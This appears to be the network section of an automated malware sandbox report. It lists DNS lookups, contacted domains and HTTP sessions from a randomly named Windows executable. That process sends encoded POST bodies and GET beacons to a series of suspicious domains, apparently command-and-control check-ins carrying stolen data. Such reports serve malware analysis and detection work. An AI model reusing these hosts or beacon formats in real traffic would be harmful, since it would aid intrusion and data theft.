Oct 21, 2024 17:27:18.527806044 CEST | 1.1.1.1 | 192.168.2.6 | 0x1c9 | No error (0) | www.ethetf.digital | ethetf.digital | | CNAME (Canonical name) | IN (0x0001) | false
Oct 21, 2024 17:27:18.527806044 CEST | 1.1.1.1 | 192.168.2.6 | 0x1c9 | No error (0) | ethetf.digital | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:27:18.527806044 CEST | 1.1.1.1 | 192.168.2.6 | 0x1c9 | No error (0) | ethetf.digital | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:27:31.663156986 CEST | 1.1.1.1 | 192.168.2.6 | 0x2c3e | No error (0) | www.booosted.xyz | booosted.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Oct 21, 2024 17:27:31.663156986 CEST | 1.1.1.1 | 192.168.2.6 | 0x2c3e | No error (0) | booosted.xyz | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:27:31.663156986 CEST | 1.1.1.1 | 192.168.2.6 | 0x2c3e | No error (0) | booosted.xyz | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:27:45.608645916 CEST | 1.1.1.1 | 192.168.2.6 | 0xa090 | No error (0) | www.djazdgc.tokyo | longg002.cn | | CNAME (Canonical name) | IN (0x0001) | false
Oct 21, 2024 17:27:45.608645916 CEST | 1.1.1.1 | 192.168.2.6 | 0xa090 | No error (0) | longg002.cn | | 8.210.49.139 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:27:59.398462057 CEST | 1.1.1.1 | 192.168.2.6 | 0x490 | No error (0) | www.productanalytics.pro | | 94.23.162.163 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:28:12.738892078 CEST | 1.1.1.1 | 192.168.2.6 | 0xad2e | Name error (3) | www.kmjai8jf.icu | none | none | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:28:43.590385914 CEST | 1.1.1.1 | 192.168.2.6 | 0xfbd2 | Name error (3) | www.gws-treinamento2.shop | none | none | A (IP address) | IN (0x0001) | false
• www.itemsort.shop
• www.rudemyvague.info
• www.sailforever.xyz
• www.launchdreamidea.xyz
• www.mondayigboleague.info
• www.stocksm.fun
• www.drevohome.shop
• www.givingaway123.net
• www.jagdud.store
• www.030002837.xyz
• www.ethetf.digital
• www.booosted.xyz
• www.djazdgc.tokyo
• www.productanalytics.pro
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49930 | 188.114.96.3 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:24:45.379426956 CEST | 496 | OUT | GET /qw71/?qFHlI=+N/0E0v6NJCVb805MplOCuiY6zvMpGzoX4nqdcW8deD1xdZOlnbQg5vou9xNSSthlFMWUYds/nxA/0yqGkfxCl1maFN4do860hmE4XwK9H8rJm4CQQIXjRIUyqXGbNbQLu85qd4=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1
Host: www.itemsort.shop
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Oct 21, 2024 17:24:45.945590973 CEST | 929 | IN | HTTP/1.1 404
Date: Mon, 21 Oct 2024 15:24:45 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n75%2Bil7R73Kb4fScxMflMCfcxbNE6yEgrq7m8moDcuvOzvuMfsIV5vz4gsg%2Fj%2Brz52%2BrEBgix0GzNPOTHlB6DTPU1WqVC1eTH7yyWe1BFV29d%2FDdTiA88EI6ke823iBLoJOsPA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d6241a1ef0c4239-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=998&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=496&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Ascii: a1<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.15.0</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49988 | 52.13.151.179 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:25:06.085642099 CEST | 760 | OUT | POST /t7t4/ HTTP/1.1
Host: www.rudemyvague.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.rudemyvague.info
Referer: http://www.rudemyvague.info/t7t4/
Content-Length: 210
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Ascii: qFHlI=EOsfGuNEzgm/VnoB7q+S5zZeb/0PhMZa8OjWvCetvFIbftOmOmr7QQ/OpfV9NdIaPVU9Q5c5pnSmZJ7co/mXNXqeaCirjT2gd+s9HQpqr6d9ran+RGBX7VVi/uudb3B7l40L0QRQ0+oHwPYliEyy+4AY8MmJLFASckS+Epi0PPW5Y0ApVdA/LXY5o/InBGF0SCAc+QNBVrOQ
Oct 21, 2024 17:25:06.652379990 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Mon, 21 Oct 2024 15:25:06 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=()
Expires: 0
Content-Encoding: gzip
Data Ascii: 2fdo0_a1Mm&G4 M[;MN{7BMmCV_v:x}l++,tMMR0)v:yYWHs48M/w6NKQTTATCwd!_C OI"FDi0Vfwb`&I3bf]0.y+f3>$%z.s2.zSRXRFeNcn?gf/N%q4Gouz]<ZDuU\8/'wS$QV+/{[FA8i"Q{ml7 $$|)e\Ra4O$/yLb0Dn^A*'s~"#Pf.a_Tg8]yXx%B1a\m#-2S\3Q!n\pK"(|ZJyjfA*NPo86YIpvYpmi?.4/X.
Oct 21, 2024 17:25:06.652417898 CEST | 106 | IN | Data Raw: c9 53 1a c3 4a a6 0c d4 c2 fd 59 c5 bb aa 67 14 60 49 15 20 b3 19 b9 84 78 e1 b3 88 17 31 74 11 65 fc 39 ca cd be 04 af 92 c7 5d 16 4d ca 2e a9 fa 74 e1 56 8f d1 1d f0 64 65 fc 08 b5 5c 92 37 5f 23 9b 5b b5 25 bb f6 0b bc 7d 1d 1a b3 87 1d 6d f7
Data Ascii: SJYg`I x1te9]M.tVde\7_#[%}m-oMoef0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49992 | 52.13.151.179 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:25:08.637603045 CEST | 784 | OUT | POST /t7t4/ HTTP/1.1
Host: www.rudemyvague.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.rudemyvague.info
Referer: http://www.rudemyvague.info/t7t4/
Content-Length: 234
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Ascii: qFHlI=EOsfGuNEzgm/WHYB95WSyzZZHP0PusZW8OvWvDK9vwgbGIKmNi/7Dg/Oj/V8C9IdPVQ1Q7I5pmymZIncrNOQMHqcPSit+D2gd+s9HQ8Nr619rp/+QjtUnFVh8uudf3B/l4010RNq08gHwPIliRSx04Byysn4CAd5UVb8aaOFOoGlQiBzJuAcZH47o9QVBmFeQC4csHBmafrzfBq95CHKs5XIoRFtv9xvDA==
Oct 21, 2024 17:25:09.193495035 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Mon, 21 Oct 2024 15:25:09 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=()
Expires: 0
Content-Encoding: gzip
Data Ascii: 2fdo0_a1Mm&G4 M[;MN{7BMmCV_v:x}l++,tMMR0)v:yYWHs48M/w6NKQTTATCwd!_C OI"FDi0Vfwb`&I3bf]0.y+f3>$%z.s2.zSRXRFeNcn?gf/N%q4Gouz]<ZDuU\8/'wS$QV+/{[FA8i"Q{ml7 $$|)e\Ra4O$/yLb0Dn^A*'s~"#Pf.a_Tg8]yXx%B1a\m#-2S\3Q!n\pK"(|ZJyjfA*NPo86YIpvYpmi?.4/X.
Oct 21, 2024 17:25:09.193511009 CEST | 106 | IN | Data Raw: c9 53 1a c3 4a a6 0c d4 c2 fd 59 c5 bb aa 67 14 60 49 15 20 b3 19 b9 84 78 e1 b3 88 17 31 74 11 65 fc 39 ca cd be 04 af 92 c7 5d 16 4d ca 2e a9 fa 74 e1 56 8f d1 1d f0 64 65 fc 08 b5 5c 92 37 5f 23 9b 5b b5 25 bb f6 0b bc 7d 1d 1a b3 87 1d 6d f7
Data Ascii: SJYg`I x1te9]M.tVde\7_#[%}m-oMoef0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49993 | 52.13.151.179 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:25:11.176045895 CEST | 1797 | OUT | POST /t7t4/ HTTP/1.1
Host: www.rudemyvague.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.rudemyvague.info
Referer: http://www.rudemyvague.info/t7t4/
Content-Length: 1246
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Ascii: qFHlI=EOsfGuNEzgm/WHYB95WSyzZZHP0PusZW8OvWvDK9v24baqCmOAX7Ag/O4/V5C9IAPU0xQ7EDpj2mbqvcq8OQZXqcQiiojT21d+d0HQsNr619rsz+AGBU31Vi/uurb3BDl8YD0R560sAHzu4lli6x84Bw1sngCAZmUVXGab7YOvmlT0QqMeMkKkIp9fl2CmVzZk8YoF9ObOvOclub6Re4vZjBsVoAj+YUYuTSBfl0d9pvAX7qKA+l0AngvmgwzHtlQFSN2cwcvjTQ1iE0TvOtfGEykTmLfDXGJZ7K4t/WrDsyDWD+S3zWczqIc0KK3S/wHennPd12BgaAJ6HS7nX/1OzagSOwyFWMw08ZVDuk7P43gX5+QmE0CDuxTPLC1vCAPs/rJdZ5kMVrGD4GLTXct0O/g0T6tMss/IB/wwe9V4n7LdyL3nQYllCPWaIgadLqaUHOph6NUmjX1Dz7t7ER/8zNh6dKUpOVfYS8HYYNvzpSwDOOo8oM0n13/KakYgD/l0QvtyicOUMKLd+4kUZQHxzSeKOHR+6s607H+ad038W5ee7hcyeY0qD06Kaqczn+nc4SnuoYLo2jTNZK/sQ/S7rdnW2eEmRp8J02Y4qUZzdk6vAWx947tmAw0YeH/qw1cCiF1mvbX2JH13go3aj43M0aqSRu9mURRKm7XeqzkkLVYZzOFeCIAsDi1xObS8hvhBC4KAYWpgD57GqX5XM9wWjP0MrgXgWomzI4X6SKS+xDJhxFdzevwEAhQCwWbgIHevMYgP+LBQDS6PANO6UTRD00r9eCEvcbvPdmequTBXagVG0EyDqyHj3LNO38rVUTJj+vayIUmfr8mIJnLvYlnRF5w/RW4ICqJG129wm+wX5XnN3CcrzDPoymEeQJsC1xTJ+3ySX9aQZQOPfB69JmmssBW0zTWHSP3Q5ugHrOxL7Z0IsvqYi2c/E9e4Nc6LDsnkroQI5ic5hVpJ1g1WCZ7wRthTOu+K9ozliyi3elSfNAAK [TRUNCATED]
Oct 21, 2024 17:25:11.754978895 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Mon, 21 Oct 2024 15:25:11 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=()
Expires: 0
Content-Encoding: gzip
Data Ascii: 2fdo0_a1Mm&G4 M[;MN{7BMmCV_v:x}|g++,tMMR0)v:y7hFdGh)-iAq^l??Y7=K2jK?J%B'<%Q~|Jb12'B@MbF]0Vs3iL`i3h\t[1.]@/0uXRl\eT%\]RXRFeNcn?gf/N%q4]__UE^Xa.CJ<~sD5KAjpIV?WNZy|M*/I)I%'?tFJYfsqJrC'}xI<U[koH"RqB~"#Pf.a_Tkg8]1yXx%B1_m=-2S\3Q!n\pK"(| ,z)~]>o|.l<$lbUa"qII\"h_z]
Oct 21, 2024 17:25:11.755026102 CEST | 106 | IN | Data Raw: 92 a7 34 86 95 4c 19 a8 85 fb b3 f2 77 55 cf 28 c0 94 2a 40 66 33 72 09 f1 c2 67 11 2f 7c e8 22 ca f8 b3 97 9b 7d 0a 5e 05 8f a7 2c 9a 90 5d 52 95 e9 c2 ad de a2 3b e0 c9 ca f8 11 6a b9 24 6f 3e 46 36 b6 ea 48 76 e5 17 78 fb 3c 34 66 0f 2b da 9e
Data Ascii: 4LwU(*@f3rg/|"}^,]R;j$o>F6Hvx<4f+g+vq+e0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49994 | 52.13.151.179 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:25:13.720053911 CEST | 499 | OUT | GET /t7t4/?qFHlI=JME/FbwkkQiTLR8EmPe57WZ7VagZp8tJ+vLJvTOCgHppMKWbYWfaRFz4/PgkMvknA1YharU87nKdOM/7k7q3Nku9by2NxiW/BugQGTFPqLFbx4j0WlxBm1BAsaWpX3N32KwZ2Ws=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1
Host: www.rudemyvague.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Oct 21, 2024 17:25:14.287341118 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Mon, 21 Oct 2024 15:25:14 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=()
Expires: 0
                                                                                                                          Data Ascii: 765<html><head><title>Suppression des donnes</title><style>body{font-family:Arial;font-size:16px;}h1{font-size:20px;text-transform:uppercase;}.bg1{background:url('/site/img/fond1.webp') center top no-repeat;}.bg2{background:url('/site/img/fond2.webp') center top no-repeat;}.bg3{background:url('/site/img/fond3.webp') center top no-repeat;}.bg4{background:url('/site/img/fond4.webp') center top no-repeat;}.bg5{background:url('/site/img/fond5.webp') center top no-repeat;}.bg6{background:url('/site/img/fond6.webp') center top no-repeat;}.bg7{background:url('/site/img/fond7.webp') center top no-repeat;}.bg8{background:url('/site/i
Timestamp: Oct 21, 2024 17:25:14.287419081 CEST | Bytes transferred: 1210 | Direction: IN
Data Raw: [hex dump omitted]
                                                                                                                          Data Ascii: mg/fond8.webp') center top no-repeat;}.bg9{background:url('/site/img/fond9.webp') center top no-repeat;}.bg10{background:url('/site/img/fond10.webp') center top no-repeat;}.bg{background-size: cover;}.zoneText{margin-top:


Session ID: 5 | Source IP: 192.168.2.6 | Source Port: 49995 | Destination IP: 103.106.67.112 | Destination Port: 80 | PID: 2656
Process: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp: Oct 21, 2024 17:25:27.875425100 CEST | Bytes transferred: 757 | Direction: OUT
POST /hshp/ HTTP/1.1
                                                                                                                          Host: www.sailforever.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.sailforever.xyz
                                                                                                                          Referer: http://www.sailforever.xyz/hshp/
                                                                                                                          Content-Length: 210
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Ascii: qFHlI=BDKkReVOQWAWGIW7o1lF9wzyziXhaeFagcLK0qk+aT9jh8F+p96YMlrtWthmx2FFZtCq64IoVBN+2DbrlqN8blIo1qhLV+XGv1KGXGuAZalkN+1RwQjz5TkKDxMMboSGEPzRF5M5KN8Hve4X7DMfvQzFHla1u3VCis9rm5yvowkawtE9LlFf2x1ObqWTOCr40ypWE4oTBufm
Timestamp: Oct 21, 2024 17:25:28.708517075 CEST | Bytes transferred: 245 | Direction: IN
HTTP/1.1 302 Found
                                                                                                                          Location: https://www.sailforever.xyz/hshp/
                                                                                                                          Server: Dynamic Http Server
                                                                                                                          X-Ratelimit-Limit: 101
                                                                                                                          X-Ratelimit-Remaining: 100
                                                                                                                          X-Ratelimit-Reset: 1
                                                                                                                          Date: Mon, 21 Oct 2024 15:25:28 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close


Session ID: 6 | Source IP: 192.168.2.6 | Source Port: 49998 | Destination IP: 103.106.67.112 | Destination Port: 80 | PID: 2656
Process: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp: Oct 21, 2024 17:25:30.426186085 CEST | Bytes transferred: 781 | Direction: OUT
POST /hshp/ HTTP/1.1
                                                                                                                          Host: www.sailforever.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.sailforever.xyz
                                                                                                                          Referer: http://www.sailforever.xyz/hshp/
                                                                                                                          Content-Length: 234
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Ascii: qFHlI=BDKkReVOQWAWHre7k29F1wzx2iXhT+FegcXK0vUuahpjhcV+q86YCFrtC9hZ+WFCZtHf64EoVBZ+2BDrld5jJFIq+KhVR+XGv1KGXGrrZexkNNtRx03wzzkFExMMRISCEPzzF9MTKP0HveIX7SMY6AzfKFaghnE0tu1vkJy99X4BxbFnXWF8khVMboOhOirS2yRWWvk0Oa6FNApvFe9ygVS6P7RNS3cBgA==
Timestamp: Oct 21, 2024 17:25:31.017003059 CEST | Bytes transferred: 245 | Direction: IN
HTTP/1.1 302 Found
                                                                                                                          Location: https://www.sailforever.xyz/hshp/
                                                                                                                          Server: Dynamic Http Server
                                                                                                                          X-Ratelimit-Limit: 101
                                                                                                                          X-Ratelimit-Remaining: 100
                                                                                                                          X-Ratelimit-Reset: 1
                                                                                                                          Date: Mon, 21 Oct 2024 15:25:30 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close


Session ID: 7 | Source IP: 192.168.2.6 | Source Port: 49999 | Destination IP: 103.106.67.112 | Destination Port: 80 | PID: 2656
Process: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp: Oct 21, 2024 17:25:32.973068953 CEST | Bytes transferred: 1794 | Direction: OUT
POST /hshp/ HTTP/1.1
                                                                                                                          Host: www.sailforever.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.sailforever.xyz
                                                                                                                          Referer: http://www.sailforever.xyz/hshp/
                                                                                                                          Content-Length: 1246
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Ascii: qFHlI= [TRUNCATED]
Timestamp: Oct 21, 2024 17:25:33.574793100 CEST | Bytes transferred: 245 | Direction: IN
HTTP/1.1 302 Found
                                                                                                                          Location: https://www.sailforever.xyz/hshp/
                                                                                                                          Server: Dynamic Http Server
                                                                                                                          X-Ratelimit-Limit: 101
                                                                                                                          X-Ratelimit-Remaining: 100
                                                                                                                          X-Ratelimit-Reset: 1
                                                                                                                          Date: Mon, 21 Oct 2024 15:25:33 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close


Session ID: 8 | Source IP: 192.168.2.6 | Source Port: 50000 | Destination IP: 103.106.67.112 | Destination Port: 80 | PID: 2656
Process: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp: Oct 21, 2024 17:25:35.515748024 CEST | Bytes transferred: 498 | Direction: OUT
GET /hshp/?qFHlI=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckP72R/Mt6dwrAbNlxqg3zWk6ZAO3Iq2rVhW9Xv/lG/d0ara89ybvpX3yverDE1fB9qSbysYNDcMdg=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1
                                                                                                                          Host: www.sailforever.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Timestamp: Oct 21, 2024 17:25:36.321356058 CEST | Bytes transferred: 673 | Direction: IN
HTTP/1.1 302 Found
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Location: https://www.sailforever.xyz/hshp/?qFHlI=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckP72R/Mt6dwrAbNlxqg3zWk6ZAO3Iq2rVhW9Xv/lG/d0ara89ybvpX3yverDE1fB9qSbysYNDcMdg=&DJ=uNx48jdPyvmhqtM0
                                                                                                                          Server: Dynamic Http Server
                                                                                                                          X-Ratelimit-Limit: 101
                                                                                                                          X-Ratelimit-Remaining: 100
                                                                                                                          X-Ratelimit-Reset: 1
                                                                                                                          Date: Mon, 21 Oct 2024 15:25:36 GMT
                                                                                                                          Content-Length: 223
                                                                                                                          Connection: close
                                                                                                                          Data Ascii: <a href="https://www.sailforever.xyz/hshp/?qFHlI=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckP72R/Mt6dwrAbNlxqg3zWk6ZAO3Iq2rVhW9Xv/lG/d0ara89ybvpX3yverDE1fB9qSbysYNDcMdg=&amp;DJ=uNx48jdPyvmhqtM0">Found</a>.


Session ID: 9 | Source IP: 192.168.2.6 | Source Port: 50001 | Destination IP: 188.114.96.3 | Destination Port: 80 | PID: 2656
Process: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp: Oct 21, 2024 17:25:41.430562019 CEST | Bytes transferred: 769 | Direction: OUT
POST /bd77/ HTTP/1.1
                                                                                                                          Host: www.launchdreamidea.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.launchdreamidea.xyz
                                                                                                                          Referer: http://www.launchdreamidea.xyz/bd77/
                                                                                                                          Content-Length: 210
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Ascii: qFHlI=nW04OhvCZUUGad3H6e2fqr2pu/jWbue8ZEGKnaZETJdQL352ARpLy8SNd0e2dDyoFkUWBunwZ2oiadMlGtvjzldMkD75248rYsGDPMWBcJvPB/delzaAF4E42aIQRb3OVnRUUMkWlHiSI/JB8ioWyByRYcWHG9F3xx8stzc/mviRn48GTDJFRJxZ1psvXk9wHYnnaXiZWZGN
Timestamp: Oct 21, 2024 17:25:41.935950041 CEST | Bytes transferred: 1236 | Direction: IN
HTTP/1.1 521
                                                                                                                          Date: Mon, 21 Oct 2024 15:25:41 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 6879
                                                                                                                          Connection: close
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sKf9Rl30VwZpejbimpEf7Ps4YFjqQbrkkZyqO9XMCDJ6cOPXPqTw3VZWAiMH2jQ5jW3APiMcX0Fjm6GuL3QwbGPLYYDN3J8lgm2zCm9oGSeBOYTXU0gLqBoBazPWLItQ4fdxqphC44a3UA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          Referrer-Policy: same-origin
                                                                                                                          Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d62430039231891-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
